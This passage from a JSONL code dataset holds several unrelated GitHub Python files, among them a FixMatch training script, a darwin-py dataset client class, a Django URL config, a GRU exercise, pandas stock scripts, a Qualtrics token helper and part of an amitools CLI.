default=4000) # number of labeled examples\n parser.add_argument('--n-classes', type=int, default=10) # number of classes\n parser.add_argument(\"--expand-labels\", action=\"store_true\", \n help=\"expand labels to fit eval steps\")\n\n # training hyperparameters\n parser.add_argument('--batch-size', type=int, default=64) # batch size\n parser.add_argument('--total-steps', default=2**14, type=int) # the scheduler steps every iteration, so the budget is given in total steps rather than epochs\n parser.add_argument('--eval-step', type=int, default=1024) # number of training steps between evaluations\n parser.add_argument('--lr', type=float, default=0.03) # learning rate\n parser.add_argument('--weight-decay', type=float, default=5e-4) # weight decay strength\n parser.add_argument('--nesterov', action='store_true', default=True) # Nesterov momentum\n parser.add_argument('--warmup', type=float, default=0.0) # number of warmup steps\n\n parser.add_argument('--use-ema', action='store_true', default=True) # whether to use an EMA of the model\n parser.add_argument('--ema-decay', type=float, default=0.999) # EMA decay rate\n\n parser.add_argument('--mu', type=int, default=7) # ratio of unlabeled to labeled data per batch (not used by the Trainer above)\n parser.add_argument('--T', type=float, default=1.0) # temperature for sharpening the pseudo-label distribution\n\n parser.add_argument('--threshold', type=float, default=0.95) # confidence threshold for pseudo-labeling\n parser.add_argument('--lambda-u', type=float, default=1.0) # weight of the unlabeled loss\n return parser\n\n\ndef main():\n \n parser = FixMatch_parser()\n args = parser.parse_args([])\n args.cuda = torch.device(\"cuda:0\")\n args.epochs = math.ceil(args.total_steps/args.eval_step)\n\n trainer = FixMatchTrainer(args)\n\n best_loss = np.inf\n losses, losses_x, losses_u = [], [], []\n \n train_losses, train_top1s, train_top5s = [], [], []\n val_losses, val_top1s, val_top5s = [], [], []\n test_losses, test_top1s, test_top5s = [], [], []\n results = {'loss': [], 'test_acc_top1': [], 'test_acc_top5': []}\n \n for epoch in range(1, args.epochs+1, 1):\n loss, loss_x, loss_u = trainer.train(epoch)\n losses.append(loss)\n losses_x.append(loss_x)\n losses_u.append(loss_u)\n\n loss, top1, top5 = trainer.validate(epoch, 'Train')\n train_losses.append(loss)\n train_top1s.append(top1)\n train_top5s.append(top5)\n\n loss, top1, top5 = trainer.validate(epoch, 'Valid')\n val_losses.append(loss)\n val_top1s.append(top1)\n val_top5s.append(top5)\n \n results['loss'].append(loss)\n results['test_acc_top1'].append(top1)\n results['test_acc_top5'].append(top5)\n \n data_frame = pd.DataFrame(data=results, index=range(1, epoch + 1))\n savepath = 'results/fixmatch'\n os.makedirs(savepath, exist_ok=True)\n data_frame.to_csv(os.path.join(savepath,'statistics.csv'), index_label='epoch')\n\n if loss < best_loss:\n best_loss = loss\n torch.save(trainer.model, os.path.join(trainer.experiment_dir, 'model.pth'))\n torch.save(trainer.ema_model, os.path.join(trainer.experiment_dir, 'ema_model.pth'))\n\n loss, top1, top5 = trainer.validate(epoch, 'Test ')\n test_losses.append(loss)\n test_top1s.append(top1)\n test_top5s.append(top5)\n\n torch.save(trainer.model, os.path.join(trainer.experiment_dir, 'checkpoint_model.pth'))\n torch.save(trainer.ema_model, os.path.join(trainer.experiment_dir, 'checkpoint_ema_model.pth'))\n \nif __name__==\"__main__\":\n main()","repo_name":"goeunchae/Business-Analytics_5","sub_path":"fixmatch.py","file_name":"fixmatch.py","file_ext":"py","file_size_in_byte":23480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"13959290812","text":"import itertools\nfrom typing import TYPE_CHECKING, Any, Dict, Iterator, List, Optional, Sequence, Union\n\nfrom requests.models import Response\n\nfrom darwin.dataset.release import Release\nfrom darwin.dataset.upload_manager import (\n FileUploadCallback,\n LocalFile,\n ProgressCallback,\n UploadHandler,\n UploadHandlerV1,\n)\nfrom darwin.dataset.utils import is_relative_to\nfrom darwin.datatypes import ItemId, PathLike\nfrom darwin.exceptions import NotFound, ValidationError\nfrom darwin.item import DatasetItem\nfrom darwin.item_sorter import ItemSorter\nfrom darwin.utils import find_files, urljoin\n\nif TYPE_CHECKING:\n from darwin.client import Client\n\nfrom darwin.dataset import RemoteDataset\n\n\nclass RemoteDatasetV1(RemoteDataset):\n \"\"\"\n Manages the remote and local versions of a dataset hosted on Darwin.\n It allows several dataset management operations such as syncing between\n remote and local, pulling a remote dataset, removing the local files, ...\n\n Parameters\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the dataset as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-cased, special characters removed and\n spaces replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n\n Attributes\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the dataset as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-cased, special characters removed and\n spaces replaced by dashes, e.g., `bird-species`. 
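Note (added): fixmatch.py above relies on helpers defined outside this excerpt (`WideResNet`, `RandAugmentMC`, `get_tqdm_config`, `accuracy`). The `accuracy(outputs, targets, topk=(1, 5))` call in `validate` appears to assume the conventional top-k precision helper; a minimal self-contained sketch of that assumption:

import torch

def accuracy(output, target, topk=(1,)):
    # Computes precision@k for each requested k, as a percentage of the batch.
    maxk = max(topk)
    batch_size = target.size(0)
    _, pred = output.topk(maxk, dim=1, largest=True, sorted=True)
    pred = pred.t()  # shape (maxk, batch)
    correct = pred.eq(target.view(1, -1).expand_as(pred))
    res = []
    for k in topk:
        correct_k = correct[:k].reshape(-1).float().sum(0)
        res.append(correct_k.mul_(100.0 / batch_size).item())
    return res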
This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n \"\"\"\n\n def __init__(\n self,\n *,\n client: \"Client\",\n team: str,\n name: str,\n slug: str,\n dataset_id: int,\n item_count: int = 0,\n progress: float = 0,\n ):\n super().__init__(\n client=client,\n team=team,\n name=name,\n slug=slug,\n dataset_id=dataset_id,\n item_count=item_count,\n progress=progress,\n )\n\n def get_releases(self) -> List[\"Release\"]:\n \"\"\"\n Get a sorted list of releases with the most recent first.\n\n Returns\n -------\n List[\"Release\"]\n Returns a sorted list of available ``Release``\\\\s with the most recent first.\n \"\"\"\n try:\n releases_json: List[Dict[str, Any]] = self.client.get_exports(\n self.dataset_id, self.team\n )\n except NotFound:\n return []\n\n releases = [\n Release.parse_json(self.slug, self.team, payload)\n for payload in releases_json\n ]\n return sorted(\n filter(lambda x: x.available, releases),\n key=lambda x: x.version,\n reverse=True,\n )\n\n def push(\n self,\n files_to_upload: Optional[Sequence[Union[PathLike, LocalFile]]],\n *,\n blocking: bool = True,\n multi_threaded: bool = True,\n max_workers: Optional[int] = None,\n fps: int = 0,\n as_frames: bool = False,\n extract_views: bool = False,\n files_to_exclude: Optional[List[PathLike]] = None,\n path: Optional[str] = None,\n preserve_folders: bool = False,\n progress_callback: Optional[ProgressCallback] = None,\n file_upload_callback: Optional[FileUploadCallback] = None,\n ) -> UploadHandler:\n \"\"\"\n Uploads a local dataset (images ONLY) in the datasets directory.\n\n Parameters\n ----------\n files_to_upload : Optional[List[Union[PathLike, LocalFile]]]\n List of files to upload. Those can be folders.\n blocking : bool, default: True\n If False, the dataset is not uploaded and a generator function is returned instead.\n multi_threaded : bool, default: True\n Uses multiprocessing to upload the dataset in parallel.\n If blocking is False this has no effect.\n max_workers : int, default: None\n Maximum number of workers to use for parallel upload.\n fps : int, default: 0\n When the uploading file is a video, specify its framerate.\n as_frames: bool, default: False\n When the uploading file is a video, specify whether it's going to be uploaded as a list of frames.\n files_to_exclude : Optional[PathLike]], default: None\n Optional list of files to exclude from the file scan. 
Those can be folders.\n path: Optional[str], default: None\n Optional path to store the files in.\n preserve_folders : bool, default: False\n Specify whether or not to preserve folder paths when uploading\n progress_callback: Optional[ProgressCallback], default: None\n Optional callback, called every time the progress of an uploading files is reported.\n file_upload_callback: Optional[FileUploadCallback], default: None\n Optional callback, called every time a file chunk is uploaded.\n\n Returns\n -------\n handler : UploadHandler\n Class for handling uploads, progress and error messages.\n\n Raises\n ------\n ValueError\n - If ``files_to_upload`` is ``None``.\n - If a path is specified when uploading a LocalFile object.\n - If there are no files to upload (because path is wrong or the exclude filter excludes everything).\n \"\"\"\n\n if files_to_exclude is None:\n files_to_exclude = []\n\n if files_to_upload is None:\n raise ValueError(\"No files or directory specified.\")\n\n uploading_files = [\n item for item in files_to_upload if isinstance(item, LocalFile)\n ]\n search_files = [\n item for item in files_to_upload if not isinstance(item, LocalFile)\n ]\n\n generic_parameters_specified = (\n path is not None or fps != 0 or as_frames is not False\n )\n if uploading_files and generic_parameters_specified:\n raise ValueError(\"Cannot specify a path when uploading a LocalFile object.\")\n\n for found_file in find_files(search_files, files_to_exclude=files_to_exclude):\n local_path = path\n if preserve_folders:\n source_files = [\n source_file\n for source_file in search_files\n if is_relative_to(found_file, source_file)\n ]\n if source_files:\n local_path = str(found_file.relative_to(source_files[0]).parent)\n uploading_files.append(\n LocalFile(found_file, fps=fps, as_frames=as_frames, path=local_path)\n )\n\n if not uploading_files:\n raise ValueError(\n \"No files to upload, check your path, exclusion filters and resume flag\"\n )\n\n handler = UploadHandlerV1(self, uploading_files)\n if blocking:\n handler.upload(\n max_workers=max_workers,\n multi_threaded=multi_threaded,\n progress_callback=progress_callback,\n file_upload_callback=file_upload_callback,\n )\n else:\n handler.prepare_upload()\n\n return handler\n\n def fetch_remote_files(\n self,\n filters: Optional[Dict[str, Union[str, List[str]]]] = None,\n sort: Optional[Union[str, ItemSorter]] = None,\n ) -> Iterator[DatasetItem]:\n \"\"\"\n Fetch and lists all files on the remote dataset.\n\n Parameters\n ----------\n filters : Optional[Dict[str, Union[str, List[str]]]], default: None\n The filters to use. Files excluded by the filter won't be fetched.\n sort : Optional[Union[str, ItemSorter]], default: None\n A sorting direction. 
It can be a string with the values 'asc', 'ascending', 'desc',\n 'descending' or an ``ItemSorter`` instance.\n\n Yields\n -------\n Iterator[DatasetItem]\n An iterator of ``DatasetItem``.\n \"\"\"\n post_filters: Dict[str, Union[str, List[str]]] = {}\n post_sort: Dict[str, str] = {}\n\n if filters:\n for list_type in [\"filenames\", \"statuses\"]:\n if list_type in filters:\n if type(filters[list_type]) is list:\n post_filters[list_type] = filters[list_type]\n else:\n post_filters[list_type] = str(filters[list_type])\n if \"path\" in filters:\n post_filters[\"path\"] = str(filters[\"path\"])\n if \"item_ids\" in filters:\n post_filters[\"dataset_item_ids\"] = filters[\"item_ids\"]\n if \"types\" in filters:\n post_filters[\"types\"] = str(filters[\"types\"])\n\n if sort:\n item_sorter = ItemSorter.parse(sort)\n post_sort[item_sorter.field] = item_sorter.direction.value\n cursor = {\"page[size]\": 500}\n while True:\n payload = {\"filter\": post_filters, \"sort\": post_sort}\n response = self.client.fetch_remote_files(\n self.dataset_id, cursor, payload, self.team\n )\n\n yield from [DatasetItem.parse(item) for item in response[\"items\"]]\n\n if response[\"metadata\"][\"next\"]:\n cursor[\"page[from]\"] = response[\"metadata\"][\"next\"]\n else:\n return\n\n def archive(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Archives (soft-deletion) the given ``DatasetItem``\\\\s belonging to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be archived.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.archive_item(self.slug, self.team, payload)\n\n def restore_archived(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Restores the archived ``DatasetItem``\\\\s that belong to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be restored.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.restore_archived_item(self.slug, self.team, payload)\n\n def move_to_new(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Changes the given ``DatasetItem``\\\\s status to ``new``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s whose status will change.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.move_item_to_new(self.slug, self.team, payload)\n\n def reset(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Resets the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be reset.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.reset_item(self.slug, self.team, payload)\n\n def complete(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Completes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be completed.\n \"\"\"\n\n def wf_template_id_mapper(item):\n return item.current_workflow[\"workflow_template_id\"]\n\n input_items: List[DatasetItem] = list(items)\n\n # We split into items with and without workflow\n items_wf = filter(lambda item: item.current_workflow, input_items)\n items_no_wf = filter(lambda item: item.current_workflow is None, input_items)\n\n # All items without workflow 
get instantiated\n items_instantiated: List[DatasetItem] = []\n for old_item in items_no_wf:\n (_, item) = self.client.instantiate_item(old_item.id, include_metadata=True)\n items_instantiated.append(item)\n\n # We create new list of items from instantiated items and other items with workflow\n # We also group them by workflow_template_id, because we can't do batch across diff templates\n items = sorted([*items_wf, *items_instantiated], key=wf_template_id_mapper)\n items_by_wf_template = itertools.groupby(\n items,\n key=wf_template_id_mapper,\n )\n\n # For each WF template, we find complete stage template id\n # and try to set stage for all items in this workflow\n for wf_template_id, current_items in items_by_wf_template:\n current_items = list(current_items)\n sample_item = current_items[0]\n deep_sample_stages = sample_item.current_workflow[\"stages\"].values()\n sample_stages = [item for sublist in deep_sample_stages for item in sublist]\n complete_stage = list(\n filter(lambda stage: stage[\"type\"] == \"complete\", sample_stages)\n )[0]\n\n filters = {\"dataset_item_ids\": [item.id for item in current_items]}\n try:\n self.client.move_to_stage(\n self.slug,\n self.team,\n filters,\n complete_stage[\"workflow_stage_template_id\"],\n )\n except ValidationError:\n raise ValueError(\n \"Unable to complete some of provided items. Make sure to assign them to a user first.\"\n )\n\n def delete_items(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Deletes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be deleted.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.delete_item(self.slug, self.team, payload)\n\n def export(\n self,\n name: str,\n annotation_class_ids: Optional[List[str]] = None,\n include_url_token: bool = False,\n include_authorship: bool = False,\n version: Optional[str] = None,\n ) -> None:\n \"\"\"\n Create a new release for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str\n Name of the release.\n annotation_class_ids : Optional[List[str]], default: None\n List of the classes to filter.\n include_url_token : bool, default: False\n Should the image url in the export include a token enabling access without team\n membership or not?\n include_authorship : bool, default: False\n If set, include annotator and reviewer metadata for each annotation.\n version : Optional[str], default: None, enum: [\"1.0\", \"2.0\"]\n When used for V2 dataset, allows to force generation of either Darwin JSON 1.0 (Legacy) or newer 2.0.\n Omit this option to get your team's default.\n \"\"\"\n if annotation_class_ids is None:\n annotation_class_ids = []\n\n payload = {\n \"annotation_class_ids\": annotation_class_ids,\n \"name\": name,\n \"include_export_token\": include_url_token,\n \"include_authorship\": include_authorship,\n }\n self.client.create_export(self.dataset_id, payload, self.team)\n\n def get_report(self, granularity: str = \"day\") -> str:\n \"\"\"\n Returns a String representation of a CSV report for this ``RemoteDataset``.\n\n Parameters\n ----------\n granularity : str, default: \"day\"\n The granularity of the report, can be 'day', 'week' or 'month'.\n\n Returns\n -------\n str\n A CSV report.\n \"\"\"\n response: Response = self.client.get_report(\n self.dataset_id, granularity, self.team\n )\n return response.text\n\n def workview_url_for_item(self, item: DatasetItem) -> str:\n \"\"\"\n Returns the darwin URL 
for the given ``DatasetItem``.\n\n Parameters\n ----------\n item : DatasetItem\n The ``DatasetItem`` for which we want the url.\n\n Returns\n -------\n str\n The url.\n \"\"\"\n return urljoin(\n self.client.base_url,\n f\"/workview?dataset={self.dataset_id}&image={item.seq}\",\n )\n\n def post_comment(\n self, item: DatasetItem, text: str, x: float, y: float, w: float, h: float\n ):\n \"\"\"\n Adds a comment to an item in this dataset.\n Instantiates a workflow if needed.\n \"\"\"\n maybe_workflow_id: Optional[int] = item.current_workflow_id\n\n if maybe_workflow_id is None:\n workflow_id: int = self.client.instantiate_item(item.id)\n else:\n workflow_id = maybe_workflow_id\n\n self.client.post_workflow_comment(workflow_id, text, x, y, w, h)\n\n def import_annotation(self, item_id: ItemId, payload: Dict[str, Any]) -> None:\n \"\"\"\n Imports the annotation for the item with the given id.\n\n Parameters\n ----------\n item_id: ItemId\n Identifier of the Image or Video that we are importing the annotation to.\n payload: Dict[str, Any]\n A dictionary with the annotation to import. The default format is:\n `{\"annotations\": serialized_annotations, \"overwrite\": \"false\"}`\n \"\"\"\n\n self.client.import_annotation(item_id, payload=payload)\n","repo_name":"v7labs/darwin-py","sub_path":"darwin/dataset/remote_dataset_v1.py","file_name":"remote_dataset_v1.py","file_ext":"py","file_size_in_byte":18788,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"50"}
+{"seq_id":"17667837867","text":"\"\"\"djingleshop URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom djingleshop_shopping.views import IndexView, AddProductView, add_item_to_cart, remove_item_from_cart, get_cart_items_list, search_for_products, get_products\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', IndexView.as_view(), name=\"main-page\"),\n path('manage/addproduct/', AddProductView.as_view(), name=\"add-product\"),\n path('manage/addcartitem/', add_item_to_cart, name=\"add_cart_item\"),\n path('manage/removecartitem/', remove_item_from_cart, name=\"remove_cart_item\"),\n path('getcartitems/', get_cart_items_list, name=\"get_cart_items\"),\n path('search', search_for_products, name=\"search_for_products\"),\n path('getproducts', get_products, name=\"get_products_list\")\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"JalonDodson/djingleshop","sub_path":"djingleshop/djingleshop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70583571035","text":"# instead of going point by point, use the batch approach\n# (you need to get used to it anyway eventually)\n\nimport torch.nn as nn\nimport torch\nfrom torchviz import make_dot\nfrom torch import optim\n\nimport logging\nlogging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG)\n\nimport pickle\nwith open('random_data.pickle', 'rb') as inf:\n d = pickle.load(inf)\n\npoints, directions = d['points'], d['directions']\ntest_points, test_directions = d['test_points'], d['test_directions']\n\n\n\n### Parsing\nimport argparse\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-v', action='store_true')\nparser.add_argument('-N', type=int, default=1000000)\nparser.add_argument('-E', type=int, default=100)\n\n\n# Parse the command line arguments.\nargs = parser.parse_args()\n\n# Get the value of the \"-v\" argument.\nVERBOSE = args.v\nEPOCH = args.E\nDATA_SIZE = args.N\n\n\n### RNN\ntorch.manual_seed(17)\ntorch.set_default_dtype(torch.float64)\n\nn_features = 2\nhidden_dim = 2\n\n# NOTE!! This is not rnn_cell but RNN!!!\nrnn_whole = nn.GRU(n_features, hidden_dim)\nrnn_state = rnn_whole.state_dict()\nprint(\"RNN coefficients\\n\", rnn_state)\n\n## Don't touch the classifier, our focus is on RNN rather than classifier\nclassifier = nn.Linear(hidden_dim, 1)\nclassifier.weight.data = torch.tensor([[-0.2732, -0.1587]], dtype=torch.float64)\nclassifier.bias.data = torch.tensor([0.5806], dtype=torch.float64)\n# ALWAYS CHECK DEFAULT WEIGHTS. THEY MIGHT CHANGE AFTER YOU CHANGE DATA TYPES\nprint('classifier coefficients\\n', classifier.state_dict())\n\n# loss = nn.BCELoss() # expects number from 0 to 1\nloss = nn.BCEWithLogitsLoss() # just sigmod with BCELoss\n\noptimizer = optim.Adam(list(rnn_whole.parameters()) + list(classifier.parameters()), lr=0.01)\n\n\n# To use the batch approach, points and directions needs to be tensors\npoints = torch.tensor(points, dtype=torch.float64)\ndirections = torch.tensor(directions, dtype=torch.float64)\n\nif VERBOSE:\n print(points.shape) # (3 points, 4 rows/point, 2 features per row )\n print(directions.shape) # (3 points)\n\n# NOTE: !! 
You can't just feed (3, 4, 2) into the RNN!!\n# It will think you have 4 points, each with 3 rows and 2 features!!\n#\n# For the GRU (and most other RNNs in PyTorch), the expected input shape is (seq_len, batch_size, input_size). The output shapes are as follows:\n#\n# output of shape (seq_len, batch_size, num_directions * hidden_size)\n# hidden of shape (num_layers * num_directions, batch_size, hidden_size)\n# In your case:\n#\n# seq_len is 4 (since each point has 4 rows)\n# batch_size is 3 (since you input 3 points)\n# input_size is 2 (as each row has 2 features)\n# hidden_size is 2 (as defined by hidden_dim)\n# Therefore, you should expect output to have the shape (4, 3, 2) and hidden to have the shape (1, 3, 2) (since you're using a single-layer unidirectional GRU).\n#\n# Change from (batch_size, seq_len, input_size) to (seq_len, batch_size, input_size)\npoints = points.transpose(0, 1)\n\n\npoints, directions = points[:DATA_SIZE], directions[:DATA_SIZE]\n\nfor epoch in range(EPOCH):\n\n ###################### Y_hat ######################\n classifier_outputs = []\n\n # Now instead of feeding point by point, we will by using it as a batch\n output, hidden = rnn_whole(points)\n\n # we want to classify on the HIDDEN\n\n # We will feed the last \"out\" to the classifier\n if VERBOSE:\n print('What are we feeding into the classifier?', hidden)\n temp = classifier(hidden)\n if VERBOSE:\n print('What comes out from the classifier?', temp)\n\n classifier_outputs.append(temp)\n\n ###################### end of Y_hat ######################\n\n # Convert [ tensor, .. ] to tensor([float, ...])\n # print(\"Classifier (Before)\", classifier_outputs)\n classifier_outputs_tensor = torch.cat(classifier_outputs).view(-1).to(torch.float64)\n if VERBOSE:\n print(\"Classifier (After)\", classifier_outputs_tensor)\n\n # Convert directions numpy array to a PyTorch tensor\n # print(\"Directions (Before)\", directions)\n directions_tensor = torch.tensor(directions, dtype=torch.float64)\n # print(\"Directions (After)\", directions_tensor)\n\n # Now we need to compute loss\n training_loss = loss(classifier_outputs_tensor, directions_tensor)\n print(f\"Epoch:{epoch}, training_loss:{training_loss.data}\")\n\n training_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n\n","repo_name":"freezetreat/learning","sub_path":"rewrite/8/GRU/1_batched.py","file_name":"1_batched.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22354848142","text":"import pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\ndef import_data(file, print_head = False):\r\n\tdf = pd.read_csv('data/{}.csv'.format(file))\r\n\tprint(file)\r\n\tif print_head == True:\r\n\t\tprint(\"First few values:\")\r\n\t\tprint(df.head())\r\n\treturn df\r\n\r\ndef import_data_date_index(file, print_head = False):\r\n\tdf = pd.read_csv('data/{}.csv'.format(file), index_col = \"Date\", parse_dates = True)\r\n\tprint(file)\r\n\tif print_head == True:\r\n\t\tprint(\"First few values:\")\r\n\t\tprint(df.head())\r\n\treturn df\r\n\r\ndef import_data_date_index_one_col(file, print_head = False):\r\n\tdf = pd.read_csv('data/{}.csv'.format(file), \r\n\t\tindex_col = 'Date', \r\n\t\tparse_dates = True, \r\n\t\tusecols = ['Date', 'Adj Close'],\r\n\t\tna_values = ['nan']\r\n\t\t)\r\n\tprint(file)\r\n\tif print_head == True:\r\n\t\tprint(\"First few values:\")\r\n\t\tprint(df.head())\r\n\treturn df\r\n\r\ndef print_max_close(df):\r\n\tclose_prices = 
df['Adj Close']\r\n\tmax_close = close_prices.max()\r\n\tprint(max_close)\r\n\r\ndef print_mean_volume(df):\r\n\tvolume = df['Volume']\r\n\tmean_volume = volume.mean()\r\n\tprint(mean_volume)\r\n\r\ndef plot_adj_close(df):\r\n\tdf['Adj Close'].plot()\r\n\tplt.show()\r\n\r\ndef plot_high_price(df):\r\n\tdf['High'].plot()\r\n\tplt.show()\r\ndef plot_two_columns(df):\r\n\tdf[['High', 'Adj Close']].plot()\r\n\tplt.show()\r\n\r\ndef creating_empty_df():\r\n\tstart_date = '2010-01-22'\r\n\tend_date = '2010-01-26'\r\n\tdates = pd.date_range(start_date, end_date) # datetime index object / \r\n\t# Creating an empty DataFrame\r\n\t# if index is not specified, the index will just run from zero upwards\r\n\tdf1 = pd.DataFrame(index = dates) \r\n\treturn df1\r\n\r\ndef join_dataframes(df_1, df_2):\r\n\tdf_1 = df_1.join(df_2)\r\n\treturn df_1\r\n\r\ndef drop_nan(df):\r\n\tdf = df.dropna() # Dropping NaN values\r\n\treturn df\r\n\r\nif __name__ == '__main__':\r\n\tfor company in [\"SPY\"]:\r\n\t\tdf = import_data_date_index_one_col(company)\r\n\t\tdf1 = creating_empty_df()\r\n\t\ttwo_df = join_dataframes(df1, df)\r\n\t\ttwo_df = drop_nan(two_df)\r\n\t\tprint(two_df)\r\nprint(\"DONE!\")","repo_name":"theoneandonlywoj/Machine-Learning-For-Trading","sub_path":"08_joining_two_df.py","file_name":"08_joining_two_df.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"50"}
+{"seq_id":"24363428021","text":"__author__ = 'jwpully'\nimport requests\n\ndef gettoken(clientId, clientSecret, dataCenter):\n\n try:\n baseUrl = \"https://{0}.qualtrics.com/oauth2/token\".format(dataCenter)\n data = { \"grant_type\": \"client_credentials\" }\n\n r = requests.post(baseUrl, auth=(clientId, clientSecret), data=data)\n\n return r.json()['access_token']\n except Exception as e:\n print(\"An error occurred while getting the Qualtrics Token\")\n print(str(e))\n exit(1)\n\n\nif __name__ == \"__main__\":\n from configmanager import settings\n\n try:\n settings = settings()\n bearerToken = gettoken(settings['QUALTRICS_CLIENTID'], settings['QUALTRICS_SECRET'], settings['QUALTRICS_DATACENTER'])\n print(\"Next command, execute:\")\n print(\"python generateexport.py --bearerToken \" + bearerToken)\n except Exception as e:\n print(\"An error occurred while running gettoken\")\n print(str(e))","repo_name":"WMInfoTech/continuous-qualtrics-exporter","sub_path":"app/lib/gettoken.py","file_name":"gettoken.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
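Note (added): a hedged sketch of how the bearer token returned by gettoken() above is typically consumed; the data center and endpoint below are illustrative placeholders, not part of the original script:

import requests
from gettoken import gettoken  # hypothetical import path, if saved as gettoken.py

token = gettoken("my-client-id", "my-client-secret", "ca1")  # placeholder credentials
# Subsequent API calls send the token in an Authorization header.
r = requests.get(
    "https://ca1.qualtrics.com/API/v3/whoami",
    headers={"Authorization": "Bearer " + token},
)
print(r.status_code, r.json())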
+{"seq_id":"9775122316","text":"import sys\n\nfrom .tool import Tool\nfrom amitools.vamos.astructs import AmigaStructTypes, TypeDumper\nfrom amitools.vamos.cfgcore import parse_scalar\n\n\nclass TypeTool(Tool):\n def __init__(self):\n Tool.__init__(self, \"type\", \"inspect internal vamos types\")\n\n def add_args(self, arg_parser):\n sub = arg_parser.add_subparsers(dest=\"type_cmd\")\n # list\n parser = sub.add_parser(\"list\", help=\"list all types\")\n # query\n parser = sub.add_parser(\"dump\", help=\"dump a single type\")\n parser.add_argument(\"type_name\", help=\"name of type\")\n # lookup\n parser = sub.add_parser(\"lookup\", help=\"lookup field in type\")\n parser.add_argument(\"type_name\", help=\"name of type\")\n parser.add_argument(\"type_field_path\", help=\"field_path, e.g. foo.bar\")\n # offset\n parser = sub.add_parser(\"offset\", help=\"find field by offset\")\n parser.add_argument(\"type_name\", help=\"name of type\")\n parser.add_argument(\"type_offset\", help=\"offset of field\")\n\n def run(self, args):\n type_cmd = args.type_cmd\n # list\n if type_cmd == \"list\":\n type_names = AmigaStructTypes.get_all_struct_names()\n for tn in sorted(type_names):\n print(tn)\n return 0\n # dump\n elif type_cmd == \"dump\":\n name = args.type_name\n s = AmigaStructTypes.find_struct(name)\n if s is None:\n print(\"type '%s' not found!\" % name, file=sys.stderr)\n return 1\n else:\n td = TypeDumper()\n td.dump(s)\n return 0\n # lookup\n elif type_cmd == \"lookup\":\n name = args.type_name\n s = AmigaStructTypes.find_struct(name)\n if s is None:\n print(\"type '%s' not found!\" % name, file=sys.stderr)\n return 1\n else:\n field_path = args.type_field_path\n field_names = field_path.split(\".\")\n field_defs = s.sdef.find_sub_field_defs_by_name(*field_names)\n if field_defs:\n td = TypeDumper()\n td.dump_fields(*field_defs)\n return 0\n else:\n print(\"Field not found:\", field_path, 